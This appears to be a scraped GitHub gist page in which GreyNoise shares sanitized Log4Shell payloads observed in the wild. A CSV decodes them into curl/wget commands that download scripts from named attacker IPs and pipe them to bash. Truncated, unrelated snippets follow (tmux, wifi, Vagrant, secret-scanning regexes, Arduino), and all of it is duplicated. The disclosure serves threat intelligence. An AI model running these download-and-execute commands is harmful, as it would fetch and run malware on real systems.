n8 nathanqthai

## payload_samples.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              13 stars
            
          
                nathanqthai
                / payload_samples.md
            
            
              Last active
              March 30, 2023 12:54
            
              
                Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence
              
          
    Samples

Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise have observed.
These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.
Examples

The follow section includes Log4Shell samples seen in the wild
URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

  
## base64_payloads.csv

          
            b64decoded
            hits

            
              (curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash
              2056

            
              (curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash
              162

            
              (curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash
              2

## cve_facets.py
#!/usr/bin/env python3
# vim: set ts=4 sw=4 ts=4 et :

import argparse
import logging
import time

import greynoise
import collections

## dashboard.sh
#!/bin/sh

session="dash$$"

# code editor
tmux new-session -d -s $session
tmux send-keys 'vim' Enter

tmux split-window -h -p 40
tmux send-keys 'htop' Enter

## wifi.sh
#!/bin/sh

INTERFACE='wlp5s0'

[ "`whoami`" = root ] || exec sudo "$0" "$@"

wpa_supplicant -B -i ${INTERFACE} -c /etc/wpa_supplicant.conf -D nl80211,wext
dhclient -r ${INTERFACE}
dhclient ${INTERFACE}

## mdless.sh
# sudo apt install ruby inotify-tools
# gem install mdless
# https://github.com/ttscoff/mdless
# refreshing preview of markdown files
mdlive() {
    while true; do
        inotifywait -q -e close_write $1;
        clear;

## Vagrantfile
# -*- mode: ruby -*-
# vi: set ft=ruby :

Vagrant.configure("2") do |config|
    # ubuntu 18.04 lts
    config.vm.box = "ubuntu/bionic64"

    # https://ghidra-sre.org/InstallationGuide.html#Requirements
    config.vm.provider "virtualbox" do |v|
        v.memory = 4096

## pre-commit.sh
#!/bin/sh

# stash before we mess around
STASH_NAME="pre-commit-$(date +%s)"
git stash save -q --keep-index $STASH_NAME

# regexes to find keys
TWILIO_KEY="\bAC[a-z0-9]{32}\b"
TWILIO_SECRET="\b[a-z0-9]{32}\b"
API_REGEXPS=( $TWILIO_KEY $TWILIO_SECRET )

## 38khz_adc.ino
void setup() {
  Serial.begin(115200); // use the serial port
  TIMSK0 = 0; // turn off timer0 for lower jitter - delay() and millis() killed
  ADCSRA = 0xe5; // set the adc to free running mode
  ADMUX = 0x40; // use adc0
  DIDR0 = 0x01; // turn off the digital input for adc0
}

void loop() {
  byte buf[256];

## readme.txt
to generate example certs
  openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout host.key -out host.crt

 run server:
  chmod +x server.py
  ./server.py

test server:
  openssl s_client -connect localhost:8888
	b64decoded	hits
	(curl -s 45.155.205.233:5874/<IP_ADDRESS>\|\|wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)\|bash	2056
	(curl -s 80.71.158.12/lh.sh\|\|wget -q -O- 80.71.158.12/lh.sh)\|bash	162
	(curl -s 80.71.158.44/lh.sh\|\|wget -q -O- 80.71.158.44/lh.sh)\|bash	2
	#!/usr/bin/env python3
	# vim: set ts=4 sw=4 ts=4 et :

	import argparse
	import logging
	import time

	import greynoise
	import collections
	#!/bin/sh

	session="dash$$"

	# code editor
	tmux new-session -d -s $session
	tmux send-keys 'vim' Enter

	tmux split-window -h -p 40
	tmux send-keys 'htop' Enter
	#!/bin/sh

	INTERFACE='wlp5s0'

	[ "`whoami`" = root ] \|\| exec sudo "$0" "$@"

	wpa_supplicant -B -i ${INTERFACE} -c /etc/wpa_supplicant.conf -D nl80211,wext
	dhclient -r ${INTERFACE}
	dhclient ${INTERFACE}
	# sudo apt install ruby inotify-tools
	# gem install mdless
	# https://github.com/ttscoff/mdless
	# refreshing preview of markdown files
	mdlive() {
	while true; do
	inotifywait -q -e close_write $1;
	clear;
	# -- mode: ruby --
	# vi: set ft=ruby :

	Vagrant.configure("2") do \|config\|
	# ubuntu 18.04 lts
	config.vm.box = "ubuntu/bionic64"

	# https://ghidra-sre.org/InstallationGuide.html#Requirements
	config.vm.provider "virtualbox" do \|v\|
	v.memory = 4096
	#!/bin/sh

	# stash before we mess around
	STASH_NAME="pre-commit-$(date +%s)"
	git stash save -q --keep-index $STASH_NAME

	# regexes to find keys
	TWILIO_KEY="\bAC[a-z0-9]{32}\b"
	TWILIO_SECRET="\b[a-z0-9]{32}\b"
	API_REGEXPS=( $TWILIO_KEY $TWILIO_SECRET )
	void setup() {
	Serial.begin(115200); // use the serial port
	TIMSK0 = 0; // turn off timer0 for lower jitter - delay() and millis() killed
	ADCSRA = 0xe5; // set the adc to free running mode
	ADMUX = 0x40; // use adc0
	DIDR0 = 0x01; // turn off the digital input for adc0
	}

	void loop() {
	byte buf[256];
	to generate example certs
	openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout host.key -out host.crt

	run server:
	chmod +x server.py
	./server.py

	test server:
	openssl s_client -connect localhost:8888